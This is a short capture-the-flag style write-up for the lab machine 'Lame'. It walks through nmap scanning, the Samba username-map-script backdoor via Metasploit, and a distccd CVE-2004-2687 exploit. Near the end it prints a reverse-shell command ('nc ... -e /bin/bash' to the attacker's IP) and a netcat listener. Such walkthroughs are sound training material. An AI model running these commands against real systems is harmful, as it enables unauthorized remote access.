LAME
Lame is easy rated Linux machine. Target IP is 10.129.213.71 lets start.
Firstly lets look at the open ports as always.
nmap -sC -sV -O -oA nmap.txt 10.129.213.71
• Port 21: running ftp protocol and allowed anonymous login.
• Port 22: running ssh
• Ports 139 and 445: are running Samba v3.0.20-Debian.
Let’s do a more detailed scan to make sure there are no missing ports.
nmap -sC -sV -O -p- -oA nmap.txt 10.129.213.71
We have one more port 3632 and it is running distccd service. I note it, we will use later. Now lets try FTP anonymous login, but nothing significant comes up.
We are looking for a backdoor related to the ftp version, there is something
I set rhosts but no session was created, it asks password.
Let’s see if anything comes with port 22. There is command execution but I will try this later.
For now let’s move on to the other port 139 which run Samba v3.0.20-Debian. There is command execution backdoor in metasploit named ‘Username map script’, lets try.
We set rhosts as a target machine 10.129.213.71 and set lhost tun0, This brings us shell.
We search for the user and root flag by browsing the directories and got.
I want to try to get shell with another way, lets remember more detailed nmap result and we see that port 3632 is open.
Googling:
There is a nmap script related to distccd service as we see, lets try.
I tried with meterpreter but no session was created.
Let’s try with Nmap. I tried 5–6 times but it didn’t work, later I realized that I wrote my IP wrong, fixed it by confirming with ifconfig. We applied reverse shell in the nmap script and opened netcat then shell dropped.
nmap -p 3632 10.129.213.71 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd ='nc -nv 10.10.14.168 4466 -e /bin/bash'""
nc -nlvp 4466
We got another shell with different method, but this time it is low privileged, we already got root flag so that is enough.